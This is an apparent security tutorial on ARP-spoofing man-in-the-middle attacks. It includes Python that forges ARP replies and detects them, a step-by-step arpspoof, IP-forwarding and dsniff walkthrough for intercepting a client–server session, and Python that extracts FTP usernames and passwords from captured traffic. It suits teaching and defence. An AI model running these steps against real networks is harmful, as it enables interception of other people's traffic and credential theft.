Man-in-the-Middle Attacks
A man-in-the-middle attack is a natural follow-up for an attacker who has already pulled off a spoofing attack. A passive attacker may be content to read the data he is after and avoid touching anything while listening in on a vulnerable host; an active attacker will use the same spoofed position to intercept and alter traffic.
A man-in-the-middle attack can be carried out through ARP spoofing, which means sending forged Address Resolution Protocol (ARP) messages on a local area network the attacker already has a foothold in. Hosts on a LAN cache the IP-to-MAC mapping they learn from ARP replies without verifying it, so a forged reply causes the victim to associate the attacker's MAC address with the IP address of another legitimate host, such as a user's workstation or a server. Once a victim's ARP cache maps the target IP address to the attacker's MAC address, every frame that victim sends to that IP address is delivered to the attacker instead. With that traffic in hand, the attacker can do any of the following during an ARP spoofing session:
1. Session hijacking – the attacker uses the spoofed ARP position to capture a user's session ID or cookie from the intercepted traffic, then replays it later to gain access to the account without knowing the password.
2. Denial of Service attack – the attacker sends forged ARP replies that map several IP addresses (for example the default gateway) to a single target device's MAC address, or to a non-existent MAC address. Traffic meant for those addresses is redirected to one device, which can be overwhelmed, or is simply dropped. DoS attacks are covered in more detail in a later chapter.
3. Man-in-the-middle attack – the attacker forwards the intercepted traffic on to its real destination so that neither victim notices anything, while reading or modifying the messages exchanged between two or more victims.
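To make the mechanism concrete, here is an added example (not from the original page or from the dsniff project) that builds the two forged ARP reply frames an ARP spoofing tool sends, parses them back, and runs the check a defender would want: an arpwatch-style monitor that flags any IP address whose announced MAC address changes. All hosts, MAC addresses and IP addresses are constructed for the example.

```python
import struct

ETH_P_ARP = 0x0806          # EtherType for ARP
ARP_REPLY = 2               # ARP opcode: 1 = request, 2 = reply


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP reply that says 'sender_ip is at sender_mac'.
    Unicast to target_mac, exactly like a forged reply aimed at one victim."""
    eth_header = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # hardware type 1 (Ethernet), protocol 0x0800 (IPv4), 6-byte MAC, 4-byte IP, opcode
    arp_header = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp_body = (mac_bytes(sender_mac) + ip_bytes(sender_ip)
                + mac_bytes(target_mac) + ip_bytes(target_ip))
    return eth_header + arp_header + arp_body


def parse_arp(frame):
    """Return the ARP fields of a frame, or None if it is not an IPv4-over-Ethernet ARP frame."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    hrd, pro, hln, pln, op = struct.unpack("!HHBBH", frame[14:22])
    if (hrd, pro, hln, pln) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


def spoof_frames(attacker_mac, client_mac, client_ip, server_mac, server_ip):
    """The two frames a man-in-the-middle keeps sending: the client is told the
    server's IP lives at the attacker's MAC, and the server is told the same about
    the client's IP. Both victims then send their traffic to the attacker."""
    return [
        build_arp_reply(attacker_mac, server_ip, client_mac, client_ip),
        build_arp_reply(attacker_mac, client_ip, server_mac, server_ip),
    ]


def detect_arp_spoofing(frames, trusted=None):
    """Defender's check: track the MAC each IP announces and report any change.
    'trusted' is an optional baseline table of known-good IP -> MAC pairs."""
    table = dict(trusted or {})
    alerts = []
    for frame in frames:
        arp = parse_arp(frame)
        if arp is None:
            continue
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        known = table.get(ip)
        if known is None:
            table[ip] = mac
        elif known != mac:
            alerts.append((ip, known, mac))   # (address, expected MAC, MAC now claimed)
    return alerts


# Constructed lab addresses for the example; none of these are real hosts.
CLIENT_MAC, CLIENT_IP = "aa:bb:cc:00:00:10", "192.168.1.10"
SERVER_MAC, SERVER_IP = "aa:bb:cc:00:00:20", "192.168.1.20"
ATTACKER_MAC = "de:ad:be:ef:00:66"
BASELINE = {CLIENT_IP: CLIENT_MAC, SERVER_IP: SERVER_MAC}

if __name__ == "__main__":
    forged = spoof_frames(ATTACKER_MAC, CLIENT_MAC, CLIENT_IP, SERVER_MAC, SERVER_IP)
    for f in forged:
        print(parse_arp(f))
    for ip, expected, seen in detect_arp_spoofing(forged, BASELINE):
        print(f"ALERT: {ip} was {expected}, now claimed by {seen}")
```

The detector only works if it has a baseline or sees the legitimate announcement first, which is why arpwatch-style tools are started before an incident rather than during one; on a switched network the monitor must also sit on a mirror port or on the victim segment to see the forged replies at all.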
Here is how an attacker may conduct ARP spoofing to perform a man-in-the-middle attack using BackTrack, the penetration-testing distribution that preceded Kali Linux and ships the same dsniff tool suite:
Step 1: Sniff out the data you need
This can be done with tools such as Wireshark, dsniff, and tcpdump. Running any of them on your network interface shows you all the traffic that reaches that interface, whether you are attached to a wireless or a wired network.
Step 2: Use a wireless adapter and put it into monitor mode
Placing a wireless adapter in monitor mode (or a wired NIC in promiscuous mode) lets you capture every frame that reaches the adapter, including those not addressed to your MAC address. On a hub, or on an open wireless network, that is enough: every host sees every frame. On a switched network it is not, because a switch consults its CAM table, which maps MAC addresses to physical ports, and delivers each frame only to the port where the destination MAC address was learned.
To see traffic intended for somebody else on a switched network, you do not need to alter the switch itself. Instead you poison the ARP caches of the two hosts you want to sit between, so that each of them maps the other's IP address to your MAC address; the switch then faithfully delivers their frames to your port. That is exactly what an ARP spoofing attack does.
Step 3: Fire up Backtrack
Once BackTrack is running, open three terminals and do the following:
1. Poison the client's ARP cache so that the server's IP address resolves to your MAC address. In the first terminal, run arpspoof with the client as the target and the server as the host you are impersonating:
arpspoof -i [interface] -t [client IP] [server IP]
2. In the second terminal, run the same command with the two IP addresses swapped (-t [server IP] followed by [client IP]). This tells the server that the client's IP address resolves to your MAC address. Both commands keep sending forged ARP replies until you stop them, which is what holds the poisoned entries in place.
3. Now that both victims send their traffic to you, you need to pass the client's packets on to the server and the server's packets back to the client, or the connection simply dies and the victims notice.
Linux can do this with its built-in IP forwarding setting. In the third terminal, enable it with:
echo 1 > /proc/sys/net/ipv4/ip_forward
With forwarding on, your machine sits in the middle of the client and the server, receiving each side's packets and relaying them to the other, so the session keeps working while you watch it.
4. Use dsniff to watch the traffic
Now that the traffic between the client and the server flows through your machine, start a password sniffer on it by running the command "dsniff" in one of the terminals. dsniff listens on the interface and prints any credentials it recognizes in cleartext protocols such as FTP, Telnet, POP and HTTP basic authentication.
5. Grab the credentials or the data you need from the FTP session
All that remains is to wait for the client to log in to the FTP server. Because FTP sends the USER and PASS commands in cleartext, dsniff displays the username and password the moment the login goes over the wire.
Users and administrators frequently reuse the same credentials across services and systems, so a password captured from one FTP login can often be used to log in elsewhere.
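To show what step 5 actually reveals, here is an added example (not from the page and not dsniff's own code) that does for FTP what dsniff's FTP decoder does: it walks the reassembled control channel of a captured session, pairs each USER command with the PASS that follows it, and uses the server's 230/530 reply to record whether the login succeeded. The capture is constructed inline; the hostnames and credentials in it are invented.

```python
import re

USER_RE = re.compile(r"^USER\s+(\S+)", re.IGNORECASE)
PASS_RE = re.compile(r"^PASS\s+(.*)$", re.IGNORECASE)


def extract_ftp_logins(control_channel):
    """control_channel: ordered (direction, line) pairs from the FTP control
    connection, direction 'C' for client->server and 'S' for server->client,
    as a sniffer sitting in the middle would see them.
    Returns a list of (username, password, accepted) tuples."""
    logins = []
    user = None         # USER seen, waiting for PASS
    pending = None      # (user, password) sent, waiting for the server's verdict
    for direction, line in control_channel:
        line = line.rstrip("\r\n")
        if direction == "C":
            match = USER_RE.match(line)
            if match:
                user = match.group(1)
                continue
            match = PASS_RE.match(line)
            if match and user is not None:
                pending = (user, match.group(1))
            continue
        if direction == "S" and pending is not None:
            code = line[:3]
            if code in ("230", "530"):          # 230 = logged in, 530 = refused
                logins.append((pending[0], pending[1], code == "230"))
                pending = None
                user = None
    return logins


# Constructed capture of one FTP control connection; nothing here is real traffic.
SAMPLE_CAPTURE = [
    ("S", "220 ftp.example.test FTP server ready\r\n"),
    ("C", "USER alice\r\n"),
    ("S", "331 Password required for alice\r\n"),
    ("C", "PASS s3cret!\r\n"),
    ("S", "230 User alice logged in\r\n"),
    ("C", "PWD\r\n"),
    ("S", '257 "/home/alice" is the current directory\r\n'),
    ("C", "QUIT\r\n"),
    ("S", "221 Goodbye\r\n"),
    ("C", "USER bob\r\n"),
    ("S", "331 Password required for bob\r\n"),
    ("C", "PASS wrong\r\n"),
    ("S", "530 Login incorrect\r\n"),
    ("C", "USER bob\r\n"),
    ("S", "331 Password required for bob\r\n"),
    ("C", "PASS Hunter2\r\n"),
    ("S", "230-Welcome to the file server\r\n"),   # multi-line reply, same code
    ("S", "230 User bob logged in\r\n"),
]

if __name__ == "__main__":
    for username, password, accepted in extract_ftp_logins(SAMPLE_CAPTURE):
        status = "ok" if accepted else "FAILED"
        print(f"{username}:{password}  ({status})")
```

Keeping the failed attempt is deliberate: a rejected password is still a password the user typed, and it often differs from the right one by a single character. The same pairing logic applies to any cleartext login protocol; the only cure is to stop using them, which is why FTP over TLS or SFTP, not a better switch, is the fix for this step.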